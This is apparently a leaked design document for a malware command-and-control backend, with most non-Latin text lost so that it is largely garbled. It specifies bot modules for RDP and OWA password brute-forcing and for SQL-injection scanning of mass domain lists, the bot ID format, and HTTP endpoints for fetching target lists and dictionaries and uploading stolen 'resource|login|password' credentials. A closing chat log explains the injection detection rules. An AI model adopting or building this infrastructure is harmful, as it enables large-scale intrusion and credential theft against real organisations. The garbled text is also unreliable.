  BACKEND     
 



   :
1)      ;    
2)       .


 

       .
    :
-   (    ;   ,  )
-   .

    ,    :   
 c .    .
      :   ,    .

          .
  ; ,         .

  ,     . ,   
   -        " ".

  :
-  RDP (  API: rdp)
-  OWA (Outlook Web Access) (  API: owa)
-   - (SQLScan) (  API: sql)

    :
-   (  TOP Alexa https://s3.amazonaws.com/alexa-static/top-1m.csv.zip;        )
-    (   ) -   
-       -    ;   4 ;   

   RDP (       -     ):
-  : mode (brute|check)
-  () : dict (    gzip)
-     : freq (  >= 0; 0 -      ;
   0 -          )

   OWA:
-   ":": dict (    gzip)

   SQLScan:
- : rules ( )

  (  )     :
-     ,            
-           ,   
 ,    RDP       120 . ,
 500  "/"  500*120=60000 , ..  .

      "     " -     
      .


API BACKEND

API    HTTP-.
 ,      HTTP 200 OK,
  - HTTP 404 Not Found.
   ,    200   .

     Content-Length.
    Content-Disposition: chunked   Connection: close.

 URL API    /group/clientid/

  group    -  
  clientid - id 

           ,
  ,   .

 :  4  6 ;  3  -    ,  1..3  - 

 :     ,    ,  .
    <name>_XYYYYYYY,  name -   ,   -  
(    ,      ),
X -         (W - windows, L - linux, A - , M - Mac OS),
YYYYYYY - 3-7   major-version, minor-version  build       
(,  6.1 build 7600   617600).
   32   0-9, A-F.
 id  - QWERTY_W617600.11223344556677889900AABBCCDDEEFF.


GET /group/clientid/scantype/settingname HTTP/1.1
      (settingname)    .
      

GET /group/clientid/scantype/domains HTTP/1.1
    .
scantype -  .

     ,       
  -.
       ;   \r\n
Content-Type: text/plain

        ,
     .   , 
    .

         ,
   " ";          ,
     ,    .
    ,  404 Not Found.


GET /group/clientid/scantype/over HTTP/1.1
  ,   
    HTTP 200 OK,    .
,       ,   -   .
  -    .
  -    /domains
   ,      .
   ,   404.


GET /group/clientid/scantype/dict HTTP/1.1
     .
  -    ,     .
Content-Type: text/plain  application/gzip

POST /group/clientid/81 HTTP/1.1
  
  -  multipart/form-data   :
  data   -     32 -   ,   
  source - UTF-8    4096  -      ( , "OWA Passwords")
     ,    .

 ,  data   UTF-8   :

resource|login|password\n

     Unix (\n),   DOS (\r\n)
  resource -  ,    ( URL.   .  IP- . ).
  login
  password - 

     .   | ( )

    

HTTP 200 OK
Content-Type: ...
Content-Length: ...

/1/


 

     :
* dashboard
*  
*   

 dashboard            .
    :
-     "/ "
-   
- -    
-        
-  / 

  ,         :
-  
- 
-   .
            ,
   ( dashboard),     .
        ,      .

  "  ",        .
      
- - 
- clientid
- group
- IP address
-  

     .

   " ".
       .

***
[10:49:01] <A> Report interval, seconds  The module will report every N seconds about its status
[10:49:35] <A> Fetch request, seconds  The module will upload the vulnerabilities found to the server every N seconds
[10:50:44] <A> Rules   Scan Rules
[10:51:11] <A>  These are the scan rules for the module. XML format is
[10:52:36] <A> <rules>
  <rule>
    <name>rule name</name>
    <type>time|diff  (one of these two options)</type>
    <value1>probe value 1</value1>
    <value2>probe value 2</value2>
    <value3>probe value 3</value3>
  </rule>
  ...
  <rule>
    ...
  </rule>
</rules>

[10:52:52] <A> CHANGE IT ONLY WHEN YOU KNOW WHAT YOU ARE DOING!
[10:54:04] <A> Domains  These are the Internet domains to scan
[10:54:22] <A> Format is: plain text file; one domain per line; line separator is \n
[10:54:26] <A> Example:
[10:54:29] <A> www.site.com
[10:54:33] <A> domain.com
[10:54:34] <A> etc
[10:55:16] <A> Thread (1..10)   Scan threads number (1..10)
[10:56:31] <A> Time threshold (0..40)   Time threshold for time difference rules, seconds (0..40)
[10:58:35] <A>  Time difference rule finds vulnerability by comparing injected and non-injected page loading time
[10:59:05] <A> Threshold (0..1000)   Char threshold (0..1000) (number of characters)
[11:01:09] <A>  This value determines injection success for difference rules. When the injected page differs from the non-injected page by this number of characters
